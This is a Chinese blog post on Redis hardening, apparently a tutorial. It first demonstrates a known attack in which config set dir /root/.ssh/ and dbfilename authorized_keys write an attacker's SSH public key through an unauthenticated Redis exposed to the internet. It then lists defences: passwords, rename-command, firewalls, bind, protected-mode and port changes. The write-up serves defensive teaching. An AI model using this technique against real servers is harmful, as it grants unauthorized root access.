- 1Git高阶教程_git设计理念
- 2Ubuntu22.04安装Node.js教程_ubuntu22.04安装node-red
- 3关于web3合约学习之HelloWorld
- 4【附源码】计算机毕业设计SSM无人驾驶汽车管理系统_登录数据流图计算机毕设
- 5巴特沃斯(Butterworth)滤波器(二)_二阶巴特沃斯滤波器公式
- 6【原创】JavaWeb的宠物领养系统(Web宠物领养系统毕业设计)
- 7最全2024年软件测试学习路线图(适合零基础),终局之战
- 8华为系统底层是用Java写的吗?和安卓的区别?_华为的it架构是java
- 9使用Redis缓存存在的问题_qimickey
- 10大学生免费申请Github Education(包括Github Copilot)
Redis安全设置_rename-command config
赞
踩
目录
一、模拟一次redis攻击事件
机器1:
ssh-keygen -t rsa
cat .ssh/id_rsa.pub 内容作为key: crackit键的value值机器2:
redis配置:
1.port 6379
2.requirepass ""
3.bind 0.0.0.0 或 ""
4.以root用户启动
5.redis所在机器有外网ip机器1连接机器2的redis执行
config set dir /root/.ssh/
config set filename/dbfilename authorized_keys
config set crackit "机器1中cat .ssh/id_rsa.pub文件内容“
save
二、安全设置
1.requirepass
密码要足够复杂64个字节以上,从节点masterauth与主节点requirepass相同
2.rename-command配置使用
rename-command keys [xkeys]
rename-command flushall [xflushall]
rename-command debug [xdebug]
rename-command shutdown [xshutdown]
rename-command config [xconfig]注
1.rename-command不支持config set,要在启动的时候就配置好
2.要在新实例中或者是未做过持久化的实例中使用,否则配置后,重新加载aof或rdb文件时会存在不能识别的命令异常
3.若存在主从,则主从配置要保持一致,否则会存在主从数据不一致的情况
3.防火墙
可以使用防火墙限制输入和输出的IP或者IP范围、端口或者端口范围
4.bind
1.bind指定Redis和哪个网卡进行绑定
2.bind不支持config set 启动时要配置好
3.Redis3.0中bind默认值为””,也就是不限制网卡的访问
Redis3.2 中bind配置为0.0.0.0才是不限制网卡的访问4.Redis3.2提供了protected-mode配置(默认开启)
若redis没有配置requirepass和bind 等价于 配置bind 127.0.0.1只能本机访问
5. port
更改默认端口6379
